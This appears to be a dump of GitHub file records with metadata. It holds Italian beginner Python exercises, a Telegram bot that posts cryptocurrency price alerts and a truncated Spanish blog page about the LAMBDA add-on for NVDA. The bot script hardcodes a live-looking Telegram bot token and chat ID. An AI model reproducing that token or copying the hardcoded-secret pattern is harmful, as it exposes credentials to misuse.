"alpha_fraction": 0.5806451439857483,
"alphanum_fraction": 0.6209677457809448,
"avg_line_length": 19.83333396911621,
"blob_id": "afdf9e93a83cfec7061e83eab92bacba7ff76b88",
"content_id": "7a03eaeb8b214db48f8dfaa226f4194903553d7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 6,
"path": "/sommalistasol.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "def list_sum(the_list):\n sum=0\n for item in the_list:\n sum = sum + item\n print(\"Somma: {}\".format(sum))\nlist_sum([1,4,10])"
},
{
"alpha_fraction": 0.5784753561019897,
"alphanum_fraction": 0.5838565230369568,
"avg_line_length": 28.342105865478516,
"blob_id": "8db9c706ecebebed9caf8dbf4b77aaae2e3723ab",
"content_id": "bddfeb1b1376b16ef29845f4848261f8f4f6982c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1124,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 38,
"path": "/shampoo_sales.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "# Create un oggetto CSVFile che rappresenti un file CSV, e che:\n#1) venga inizializzato sul nome del file csv, e\n#2) abbia un attributo “name” che ne contenga il nome\n#3) abbia un metodo “get_data” che torni i dati dal file CSV come numeri di una lista (come abbiamo già visto).\n\n# oggetto CSVFile\n# - init(filename)\n# - name\n# - get_data\n# return dati\n\n\nclass CSVFile:\n def __init__(self, name):\n self.name = name\n \n def get_data(self):\n values = []\n\n # Inizializzo la lista vuota per salvare i\n my_file = open(self.name, 'r')\n\n for line in my_file:\n # faccio lo split di ongi riga sulla virgola\n elements = line.split(',')\n\n # Se NON sto processando l'intestazione...\n if elements[0] != 'Date':\n # Setto la data e il valore\n date = elements [0]\n value = elements [1]\n # Aggiungo alla lista dei valori questo valore\n values.append(float(value))\n return values\n \n\nmy_file = CSVFile(name = 'shampoo_sales.csv')\nprint(my_file.get_data())\n"
},
{
"alpha_fraction": 0.6234718561172485,
"alphanum_fraction": 0.6234718561172485,
"avg_line_length": 23.117647171020508,
"blob_id": "4168624b1d114ec13837b66db840f09624fd1cd1",
"content_id": "7a336664182cb031ffebbe787c0a9d4f8b62a672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 17,
"path": "/temp/esempioimplementazione.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "class Model(object):\n\n def fit(self,data):\n pass\n \n def predict(self):\n pass\n\nclass IncrementMode(Model):\n\n def fit(self,data):\n raise NotImplementedError('Questo modello non prevede un fit')\n \n def predict(self, prev_months):\n # codice per far funzionare la predizione\n # Nota: prev_months deve contenere i dati degli 'n' mesi precedenti \n pass"
},
{
"alpha_fraction": 0.6929375529289246,
"alphanum_fraction": 0.711361289024353,
"avg_line_length": 21.18181800842285,
"blob_id": "2a4fee23233fae8137fb2954c7e77269081063c4",
"content_id": "df9f2bad0122b165b94954bea2b391b991039492",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 977,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 44,
"path": "/esempioclasse.py",
"repo_name": "elisagiacomini/programming.lab",
"src_encoding": "UTF-8",
"text": "\n\nclass Pagina:\n # numero\n # pagina\n # testo\n\n def __init__(self,numero,capitolo,testo):\n\n self.numero = numero\n self.capitolo = capitolo\n self.testo = testo\n\npagina1 = Pagina(numero=1, capitolo='Primo Capitolo',testo='blah blah')\n\npagina2 = Pagina(numero=2, capitolo='Secondo Capitolo', testo='ciao ciao')\n\nprint(pagina1.testo)\nprint(pagina2.testo)\n\nclass PaginaSinistra(Pagina):\n \n def posizione_numero(self):\n return 'sinistra'\n\nclass PaginaDestra(Pagina):\n def posizione_numero(self):\n return 'destra'\n\npagina1 = PaginaSinistra(numero=1, capitolo='Primo Capitolo', testo = 'blah blah')\npagina2 = PaginaDestra(numero=2, capitolo='Secondo Capitolo', testo='ciao ciao')\n\nprint(pagina1.testo)\nprint(pagina1.numero)\nprint(pagina2.testo)\nprint(pagina2.numero)\nprint(PaginaSinistra.posizione_numero(pagina1))\nprint(PaginaDestra.posizione_numero(pagina2))\n\n\nlibro=[]\n\nlibro.append(pagina1)\nlibro.append(pagina2)\n\nprint(libro)"
}
] | 6 |
reyvand/sqli-column-detector
|
https://github.com/reyvand/sqli-column-detector
|
5a77d8b6bd42ce6e3da93d8cb0e43a971ca57245
|
f3750a3b682fdb0dc73d54e6784fbd48b081d988
|
f033ac5465d79b15ac6b1ec2a65b02519b4c73d0
|
refs/heads/master
| 2021-05-01T19:19:15.683664 | 2018-02-10T14:05:22 | 2018-02-10T14:05:22 | 121,019,498 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7363184094429016,
"alphanum_fraction": 0.7412935495376587,
"avg_line_length": 23.125,
"blob_id": "a63288c981957ead14a925a7475ccfa9dfd701c6",
"content_id": "6f1e0e255c15085aa5329e23d46c91d332cf514e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 8,
"path": "/readme.md",
"repo_name": "reyvand/sqli-column-detector",
"src_encoding": "UTF-8",
"text": "# SQLi Column Detector\r\n\r\nSimple automated script to check available column from SQL Injection method\r\n\r\n### Requirements\r\n\r\n- python3\r\n- Libraries needed : re, requests (you can install it with pip)\r\n"
},
{
"alpha_fraction": 0.6204212307929993,
"alphanum_fraction": 0.6295787692070007,
"avg_line_length": 32.15625,
"blob_id": "0ff03e2142e52fc48a52e1583431017f8f27876e",
"content_id": "3d460a4071dedb970054079f1946c593055cf4f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2184,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 64,
"path": "/sqli.py",
"repo_name": "reyvand/sqli-column-detector",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\r\n\r\n'''\r\ni <3 asuka\r\n'''\r\nimport re\r\nimport requests as r\r\nfrom argparse import ArgumentParser\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\ndef show_payload():\r\n\tbanner = \"\\nList of Available Payload\\n\\n 1 String Based Injection\\t' order by X-- -\\n 2 Integer Based Injection\\torder by X-- -\"\r\n\treturn banner\r\n\r\ndef payload(num):\r\n\tpl = {1:\"'order by \", 2:' order by '}\r\n\treturn pl[num]\r\n\r\ndef check(target, payload, col):\r\n\ttmp = list()\r\n\tc = 1\r\n\terror = ['Warning','warning','Error','error','Unknown','unknown','Column','Clause','clause','expects','parameter','resource','boolean','check','manual','order']\r\n\tx = set(r.get(target+\"'\").text.split(\" \")).intersection(set(error))\r\n\tif len(x) > 0:\r\n\t\tprint(\"Error detected\")\r\n\t\twhile c <= col :\r\n\t\t\turl = target+payload+\"%i -- -\" %c\r\n\t\t\tphew = r.get(url).text\r\n\t\t\tprint(re.findall(r\"Column|Clause|clause'|expects|parameter|resource|boolean|check|manual|'order\", phew))\r\n\t\t\tif len(re.findall(r\"Column|Clause|clause'|expects|parameter|resource|boolean|check|manual|'order\", phew)) > 0:\r\n\t\t\t\tprint(\"Column found : %i\" %(c-1))\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Tryin' ordered by %i\" %c)\r\n\t\t\tc += 1\r\n\telse:\r\n\t\tprint(\"Error not detected\")\r\n\t\twhile c <= col :\r\n\t\t\turl = target+payload+\"%i -- -\" %c\r\n\t\t\tx = r.get(url).text\r\n\t\t\tif len(tmp) < 1:\r\n\t\t\t\ttmp.append(x)\r\n\t\t\t\r\n\t\t\tif x == tmp[len(tmp)-1]:\r\n\t\t\t\ttmp.append(x)\r\n\t\t\t\tprint(\"Tryin' ordered by %i\" %c)\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Column found : %i\" %(c-1))\r\n\t\t\t\tbreak\r\n\t\t\tc += 1\r\n\r\n\r\nif __name__ == '__main__':\r\n\tparser = ArgumentParser(description=\"Simple SQL Injection Tools to Check Column's Count and Print Some Basic Info\")\r\n\tparser.add_argument('-t', '--target', dest=\"target\", help=\"specify the target url\")\r\n\tparser.add_argument('-p', '--payload', dest=\"payload\", help=\"choose the payload\", type=int)\r\n\tparser.add_argument('-c', '--columns', dest=\"col\", help=\"set the max columns guest. default=20\", type=int, default=20)\r\n\tparser.add_argument('--show-payload', dest=\"show\", action=\"store_true\", help=\"list of available payload\")\r\n\targs = parser.parse_args()\r\n\r\n\tif args.show == True:\r\n\t\tprint(show_payload())\r\n\telse:\r\n\t\tcheck(args.target, payload(args.payload), args.col)"
}
] | 2 |
TretornESP/DeadManLatch
|
https://github.com/TretornESP/DeadManLatch
|
a07ab9de1f5659e50cc148598a238fa3742c2c31
|
ce713f617fa24979edb93d64e330ea5790f107c2
|
cb5bf3d2425c9f086c9a0f3aebcd6bd57db50eb5
|
refs/heads/main
| 2023-02-10T04:07:11.668728 | 2021-01-01T15:06:59 | 2021-01-01T15:06:59 | 326,000,734 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6200578808784485,
"alphanum_fraction": 0.6264866590499878,
"avg_line_length": 36.03571319580078,
"blob_id": "ef197554b68cbffa8012d1e8194cb971d277ad0a",
"content_id": "b7d4614ff2a83abc3634cf345701c9ea053ef26a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3111,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 84,
"path": "/saveme.py",
"repo_name": "TretornESP/DeadManLatch",
"src_encoding": "UTF-8",
"text": "#Twitter encriptor controller (Watches a hashtag for orders and decrypts or encrypts)\n#This software is just for testing purposes, dont rely on it on the real world!!\n\nfrom pathlib import Path\nimport tweepy\nimport pyAesCrypt\nimport time\nimport os\n\n#place your files under the folder secretos_de_estado\n#the file pwd.txt must contain the password for encrypt/decrypt IT WILL BE HASHED TOO!!\n#tweets must be like:\n #hashtag pwd:password\n#if decrypting password must be the decryption key (yeah, i know, pretty dumb if someone copied our data)\n#if encrypting password must be the same as trigger field below\n\n####input your credentials here (Get a twitter developer account)\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_token_secret = ''\n###input your hashtags\nsafe_hashtag=\"#imsafenow\"\nrisk_hashtag=\"#imatrisknow\"\n###input the encrypt activation passphrase NOT THE SAME AS THE ENCRYPTION KEY!!!\n###This is just to avoid people randomly triggering the encryption process\ntrigger=\"patata\"\n\nlast_risk = ''\nlast_safe = ''\n\n\ndef encrypt():\n bufferSize = 64 * 1024\n with open(\"./secretos_de_estado/pwd.txt\", 'r') as reader:\n password = reader.read()\n # encrypt\n pathlist = Path(\"./secretos_de_estado\").glob('./*.*')\n for path in pathlist:\n # because path is object not string\n path_in_str = str(path)\n print(path_in_str)\n pyAesCrypt.encryptFile(path_in_str, path_in_str+\".aes\", password, bufferSize)\n os.remove(path_in_str)\n\ndef decrypt(password):\n bufferSize = 64 * 1024\n # decrypt\n pathlist = Path(\"./secretos_de_estado\").glob('./*.*')\n for path in pathlist:\n # because path is object not string\n path_in_str = str(path)\n print(path_in_str)\n pyAesCrypt.decryptFile(path_in_str, path_in_str[:-4], password, bufferSize)\n os.remove(path_in_str)\n\ndef tweet(enc):\n global last_risk, last_safe\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth,wait_on_rate_limit=True)\n\n while True:\n time.sleep(5)\n if enc:\n for tweet in tweepy.Cursor(api.search,q=safe_hashtag,count=100, since_id=last_risk).items():\n print (tweet.created_at, tweet.text)\n if \"pwd:\" in tweet.text:\n if tweet.text[tweet.text.index(\"pwd:\") + len(\"pwd:\"):] == trigger:\n last_risk = tweet.id\n encrypt()\n return\n else:\n for tweet in tweepy.Cursor(api.search,q=risk_hashtag,count=100, since_id=last_safe).items():\n print (tweet.created_at, tweet.text)\n if \"pwd:\" in tweet.text:\n print(\"PWD DETECTED: \" +tweet.text[tweet.text.index(\"pwd:\") + len(\"pwd:\"):])\n last_safe = tweet.id\n decrypt(tweet.text[tweet.text.index(\"pwd:\") + len(\"pwd:\"):])\n return\n\nif __name__==\"__main__\":\n while True:\n tweet(os.path.isfile('./secretos_de_estado/pwd.txt'))\n"
}
] | 1 |
nicolevanderhoeven/shortform-to-readwise
|
https://github.com/nicolevanderhoeven/shortform-to-readwise
|
3e41308ee5f983fd8ba920bffe89f0372c663df9
|
d8aeb2d507f54bfe7993836347fbc4f4ca5b428b
|
734a42abbff3b65707d9d7a590b9297db6e9e578
|
refs/heads/master
| 2023-08-11T06:25:25.381209 | 2021-10-10T21:23:38 | 2021-10-10T21:23:38 | 395,456,045 | 9 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7592592835426331,
"alphanum_fraction": 0.7592592835426331,
"avg_line_length": 26,
"blob_id": "1992f717a908e2ab3861ca4b22730a533be9cb9e",
"content_id": "04e110b8cde627bbee009a3509e3db1e4a1e3b19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 6,
"path": "/variables.py",
"repo_name": "nicolevanderhoeven/shortform-to-readwise",
"src_encoding": "UTF-8",
"text": "# Your authorization token for Shortform\nauthToken = ''\n\n# Your Readwise API token\n# Retrieve this token from https://readwise.io/access_token\nreadwiseToken = ''\n"
},
{
"alpha_fraction": 0.7598615884780884,
"alphanum_fraction": 0.7716262936592102,
"avg_line_length": 67.80952453613281,
"blob_id": "4ffda2af1efd9c3f490a61325cc773ba50d1f9bb",
"content_id": "747e2e64b4b28bb98f691f5370de5931de027346",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1445,
"license_type": "no_license",
"max_line_length": 597,
"num_lines": 21,
"path": "/README.md",
"repo_name": "nicolevanderhoeven/shortform-to-readwise",
"src_encoding": "UTF-8",
"text": "# Shortform to Readwise\n\n\n\nThis script scrapes [Shortform](https://www.shortform.com) for highlights and sends them to [Readwise](https://readwise.io). Accounts with both Shortform and Readwise are required.\n\n## Usage\n\nFor more detailed instructions, check out my blog post [here](https://nicolevanderhoeven.com/blog/20210815-shortform-to-readwise/).\n\nEnter the required data in `variables.py`.\n\n`authToken` is the Authorization token that you use for Shortform. Shortform unfortunately doesn't expose this, but you can find out yours by opening up DevTools in Chrome or Firefox and navigating to, for example, [your highlights page](https://www.shortform.com/app/highlights). In the DevTools Network tab, look for the request with the name `?sort=date` and click on it. In the Request Headers panel, you'll see a header `Authorization`, with the value `Basic <your token>`. Copy everything after `Basic ` and paste it into `variables.py`. _(Note: There shouldn't be any spaces in the token.)_\n\n`readwiseToken` is your API token for Readwise, which you can get [here](https://readwise.io/access_token).\n\nClone or download this repo, cd into it, and run the main script: `python3 gethighlights.py` .\n\nYou should be able to see your highlights appear in [your Readwise library](https://readwise.io/books).\n\nTo run this script automatically, you can use crontab or similar.\n"
},
{
"alpha_fraction": 0.48318761587142944,
"alphanum_fraction": 0.5060524344444275,
"avg_line_length": 39.73972702026367,
"blob_id": "e2308030e8178b8e59c4e9fee33232fd944a6504",
"content_id": "56a8eec9ea760b41e0da83822cd974c4aad477e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2974,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 73,
"path": "/gethighlights.py",
"repo_name": "nicolevanderhoeven/shortform-to-readwise",
"src_encoding": "UTF-8",
"text": "import re\nimport glob\nimport os\nimport requests\nimport calendar\nimport time\nimport json\nimport datetime\n\nfrom variables import authToken, readwiseToken\n\nreadwiseUrl = 'https://readwise.io/api/v2/highlights/'\ndict = {}\ndict['highlights'] = []\ncontents = []\ndictData = {}\n\n# Get highlights\nresponse = requests.get('https://www.shortform.com/api/highlights/?sort=date', headers={\"Authorization\": \"Basic \" + authToken, \"X-Sf-Client\": \"11.7.0\"})\n\n# Parse JSON body\nobj = json.loads(response.content)\nfor item in obj: # data\n for key in obj[item]: # unnamed full highlight obj\n dictData = {}\n for prop in key: # content, created, id, quote, text...\n if prop == 'content':\n for param in key[prop]: # content_type, doc, id, order, title, url_slug\n if param == 'doc':\n for meta in key[prop][param]: # author, cover_image, doc_type, id, title, url_slug\n value = key[prop][param][meta]\n if meta == 'author':\n dictData['author'] = value\n if meta == 'cover_image':\n dictData['imageUrl'] = 'https:' + value.replace('\\\\','')\n if meta == 'title':\n dictData['title'] = 'Shortform-' + value\n if meta == 'url_slug':\n dictData['source_url'] = 'https://www.shortform.com/app/book/' + value\n if param == 'order':\n dictData['location'] = key[prop][param]\n dictData['location_type'] = 'page'\n if prop == 'created':\n # value = key[prop]\n # Shortform date format: 2021-08-14T21:14:43.107973+00:00\n # Readwise's expected format: 2020-07-14T20:11:24+00:00\n # Current output format: 2021-09-02T18:56:39+00:00\n # Turn value into datetime, remove microseconds, convert it to string, and add : in the timezone.\n value = datetime.datetime.strptime(key[prop], '%Y-%m-%dT%H:%M:%S.%f%z')\n value = value.replace(microsecond=0)\n value = value.strftime('%Y-%m-%dT%H:%M:%S%z')\n tzMins = value[-2:]\n value = value[:-2] + ':' + tzMins\n dictData['highlighted_at'] = value\n if prop == 'quote':\n value = key[prop]\n dictData['text'] = value.replace('\\n','')\n if prop == 'text':\n value = key[prop]\n if value != '':\n dictData['note'] = value\n if dictData != {}:\n dictData['source_type'] = 'book'\n dict['highlights'].append(dictData)\n\n# Send highlights to Readwise\n# response = requests.post(\n# url=readwiseUrl,\n# headers={\"Authorization\": \"Token \" + readwiseToken},\n# json=dict\n# )\n\nprint(dict)\n"
}
] | 3 |
krpromer/mBot
|
https://github.com/krpromer/mBot
|
6d22017ede6ce2596399dc0b65f9626af0ac26ed
|
41d980c4b274bc0a358451312e9f0b0b495a688b
|
9f5603c315e5aad10ab81fa2ad66c301816e1e69
|
refs/heads/master
| 2020-02-26T13:29:03.395680 | 2017-07-01T14:53:15 | 2017-07-01T14:53:15 | 95,525,980 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.6394557952880859,
"avg_line_length": 10.230769157409668,
"blob_id": "654401d3ed344f7875354a1ff4c9b80ebe04f471",
"content_id": "89a722dc5106008996e7dd5d81f484c34672c52a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 13,
"path": "/new.ini",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "[INFO]\nversion = 1\nrun = 1\n\n[COIN]\nbtc_ltc = 1\nbtc_waves = 1\nbtc_snm = 1\n\n[PRICE]\nbtc_ltc = 0.00000001\nbtc_waves = 0.00000001\nbtc_snm = 0.0000001\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 11,
"blob_id": "60a4366bf1fff2813f9a4d558dfae18cb2a98aa4",
"content_id": "c8c4c3635a69769894c86288e04fc3415b1a9ef7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 2,
"path": "/README.md",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "# mBot\nFor telegram bot\n"
},
{
"alpha_fraction": 0.614833414554596,
"alphanum_fraction": 0.6413471698760986,
"avg_line_length": 27.18181800842285,
"blob_id": "5124b56915210811b4bac2e0727f24276188e700",
"content_id": "f87144476722218e07337b3d6875f986d84d8788",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2793,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 99,
"path": "/bot.py",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "import ConfigParser\nimport subprocess\nimport requests\nimport json\nimport time\n\nTOKEN = \"439659276:AAFoPRUbHjsLOmEtN5aDieR1HjU_VojBmUY\"\nCHAT_ID = \"64750298\"\nPOLONIEX_URL = \"http://poloniex.com/public?command=returnTicker\"\nBITTREX_URL = \"https://bittrex.com/api/v1.1/public/getticker?market=btc-waves\"\nLIQUI_URL = \"https://api.liqui.io/api/3/ticker/snm_btc\"\n\nBOT_URL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\nBTC_LTC = 0\nBTC_WAVES = 0\nBTC_SNM = 0\nPRICE_LTC = 0.00000001\nPRICE_WAVES = 0.00000001\nPRICE_SNM = 0.00000001\nTEMP = 0.00000001\nrun = 1\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\ndef send_message(text, chat_id):\n url = BOT_URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n get_url(url)\n\ndef diff(a, b):\n\tif a > b:\n\t\treturn a/b\n\telse:\n\t\treturn b/a\n\nwhile run:\n\tp = subprocess.Popen('git pull', shell = True, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)\n\n\tmConfig = ConfigParser.ConfigParser()\n\tmConfig.read('config.ini')\n#print 'Version', mConfig.getint('INFO', 'version')\n\tBTC_LTC = mConfig.getint('COIN', 'BTC_LTC')\n\tBTC_WAVES = mConfig.getint('COIN', 'BTC_WAVES')\n\tBTC_SNM = mConfig.getint('COIN', 'BTC_SNM')\n\trun = mConfig.getint('INFO', 'run')\n\n\tif BTC_LTC == 1:\n\t\tPRICE_LTC = mConfig.getfloat('PRICE', 'BTC_LTC')\n\t\tcontent = get_url(POLONIEX_URL)\n\t\tif content == \"\":\n\t\t\tprint 'POLO ERROR'\n\t\telse:\n\t\t\tcoinInfo = json.loads(content)\n\t\t\tTEMP = float(coinInfo['BTC_LTC']['last'])\n\t\t\tCH = diff(PRICE_LTC, TEMP)\n\t\t\tprint 'price=',PRICE_LTC,' now=',TEMP,' debug ltc = ', CH\n\t\t\tif CH > 1.05:\n\t\t\t\tmConfig.set('PRICE','BTC_LTC',TEMP)\n\t\t\t\tMSG = \"LTC =\", TEMP\n\t\t\t\tsend_message(MSG, CHAT_ID)\n\n\tif BTC_WAVES == 1:\n\t\tPRICE_WAVES = mConfig.getfloat('PRICE', 'BTC_WAVES')\n\t\tcontent = get_url(BITTREX_URL)\n\t\tif content == \"\":\n\t\t\tprint 'BITTREX ERROR'\n\t\telse:\n\t\t\tcoinInfo = json.loads(content)\n\t\t\tTEMP = float(coinInfo['result']['Last'])\n\t\t\tCH = diff(PRICE_WAVES, TEMP)\n\t\t\tprint 'price=',PRICE_WAVES,' now=',TEMP,' debug waves = ', CH\n\t\t\tif CH > 1.05:\n\t\t\t\tmConfig.set('PRICE','BTC_WAVES',TEMP)\n\t\t\t\tMSG = \"WAVES =\", TEMP\n\t\t\t\tsend_message(MSG, CHAT_ID)\n\n\tif BTC_SNM == 1:\n\t\tPRICE_SNM = mConfig.getfloat('PRICE', 'BTC_SNM')\n\t\tcontent = get_url(LIQUI_URL)\n\t\tif content == \"\":\n\t\t\tprint 'LIQUI ERRROR'\n\t\telse:\n\t\t\tcoinInfo = json.loads(content)\n\t\t\tTEMP = float(coinInfo['snm_btc']['last'])\n\t\t\tCH = diff(PRICE_SNM, TEMP)\n\t\t\tprint 'price=',\"{0:.8f}\".format(PRICE_SNM),' now=',\"{0:.8f}\".format(TEMP),' debug snm = ',\"{0:.8f}\".format(CH)\n\t\t\tif CH > 1.05:\n\t\t\t\tmConfig.set('PRICE','BTC_SNM',TEMP)\n\t\t\t\tMSG = \"SNM =\", \"{0:.8f}\".format(TEMP)\n\t\t\t\tsend_message(MSG, CHAT_ID)\n\t\n\tmConfigFile = open('config.ini', 'w')\n\tmConfig.write(mConfigFile)\n\tmConfigFile.close()\n\tprint time.strftime(\"%y/%m/%d %H:%M:%S\", time.localtime())\n\ttime.sleep(30)\n\n"
},
{
"alpha_fraction": 0.4413793087005615,
"alphanum_fraction": 0.6275861859321594,
"avg_line_length": 10.076923370361328,
"blob_id": "d22431012d85b458f7248305fbedd2c0b4f3cdaf",
"content_id": "941a32341d78e87b26117953c145030e1c258f3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 13,
"path": "/config.ini",
"repo_name": "krpromer/mBot",
"src_encoding": "UTF-8",
"text": "[INFO]\nversion = 1\nrun = 1\n\n[COIN]\nbtc_ltc = 1\nbtc_waves = 1\nbtc_snm = 1\n\n[PRICE]\nbtc_ltc = 0.01576466\nbtc_waves = 0.001519\nbtc_snm = 2.782e-05\n\n"
}
] | 4 |
lambda-nvda-esp/lambda-nvda-esp.github.io
|
https://github.com/lambda-nvda-esp/lambda-nvda-esp.github.io
|
036f84e33c72d495ff4078cb7cbb1b12f9f6bdd9
|
eff0995772294031e0ead0e6efb94828d04f35f2
|
791d0a3065414d2ea2d8944b2b4705183b158cef
|
refs/heads/master
| 2021-01-21T21:09:31.463146 | 2017-10-23T15:53:42 | 2017-10-23T15:53:42 | 92,311,152 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7058847546577454,
"alphanum_fraction": 0.7248494029045105,
"avg_line_length": 93.87258911132812,
"blob_id": "d6042fbe59766ddefd9ecfa6760173d8bbdbb7a2",
"content_id": "369603cd077f3549e39eae347b0a99f162d093cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 24819,
"license_type": "no_license",
"max_line_length": 926,
"num_lines": 259,
"path": "/index.html",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html prefix=\"og: http://ogp.me/ns# article: http://ogp.me/ns/article# \" lang=\"es\">\n<head>\n<meta charset=\"utf-8\">\n<meta name=\"description\" content=\"sitio sobre la organización lambda-nvda-esp y el uso de LAMBDA con NVDA en español\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n<title>LAMBDA con NVDA en español</title>\n<link href=\"assets/css/all-nocdn.css\" rel=\"stylesheet\" type=\"text/css\">\n<meta name=\"theme-color\" content=\"#5670d4\">\n<meta name=\"generator\" content=\"Nikola (getnikola.com)\">\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"RSS\" href=\"rss.xml\">\n<link rel=\"canonical\" href=\"https://lambda-nvda-esp.github.io/\">\n<!--[if lt IE 9]><script src=\"assets/js/html5.js\"></script><![endif]--><link rel=\"prefetch\" href=\"a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/\" type=\"text/html\">\n</head>\n<body>\n<a href=\"#content\" class=\"sr-only sr-only-focusable\">Ir al contenido principal</a>\n\n<!-- Menubar -->\n\n<nav class=\"navbar navbar-inverse navbar-static-top\"><div class=\"container\">\n<!-- This keeps the margins nice -->\n <div class=\"navbar-header\">\n <button type=\"button\" class=\"navbar-toggle collapsed\" data-toggle=\"collapse\" data-target=\"#bs-navbar\" aria-controls=\"bs-navbar\" aria-expanded=\"false\">\n <span class=\"sr-only\">Mostrar navegación</span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n <span class=\"icon-bar\"></span>\n </button>\n <a class=\"navbar-brand\" href=\"https://lambda-nvda-esp.github.io/\">\n\n <span id=\"blog-title\">LAMBDA con NVDA en español</span>\n </a>\n </div>\n<!-- /.navbar-header -->\n <div class=\"collapse navbar-collapse\" id=\"bs-navbar\" aria-expanded=\"false\">\n <ul class=\"nav navbar-nav\">\n<li>\n<a href=\"p/distribuidores\">Distribuidores LAMBDA en España</a>\n </li>\n<li>\n<a href=\"p/about\">Sobre Nosotros</a>\n </li>\n<li>\n<a href=\"archive.html\">Archivo</a>\n </li>\n<li>\n<a href=\"rss.xml\">Canal RSS</a>\n\n \n </li>\n</ul>\n<ul class=\"nav navbar-nav navbar-right\"></ul>\n</div>\n<!-- /.navbar-collapse -->\n </div>\n<!-- /.container -->\n</nav><!-- End of Menubar --><div class=\"container\" id=\"content\" role=\"main\">\n <div class=\"body-content\">\n <!--Body content-->\n <div class=\"row\">\n \n \n\n \n<div class=\"postindex\">\n <article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/\" class=\"u-url\">Actualizaciones de agosto a octubre de 2017: versión 1.2.1 y transición a NVDA.es</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/actualizaciones-de-agosto-a-octubre-de-2017-version-121-y-transicion-a-nvdaes/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-10-23T17:47:32+02:00\" title=\"2017-10-23 17:47\">2017-10-23 17:47</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <p>Desde agosto se han realizado varios cambios reseñables en el complemento. Por ejemplo, la publicación de la versión 1.2.1 del complemento que ya se puede descargar desde la web oficial e incluye mejoras relativas al braille.\nPero la novedad más importante que hay que anunciar llega este lunes 23 de octubre. Debido a que se ha creado y presentado una nueva y completa web para la comunidad hispanohablante de NVDA, se ha decidido que los contenidos de esta web se integren en la nueva, de forma que los usuarios puedan conocer todas las novedades sobre NVDA y su entorno en un solo lugar. Así pues, se anuncia que desde ahora y progresivamente se comenzará a cambiar cierta información de interés general. Al final del proceso la vocación de informar sobre 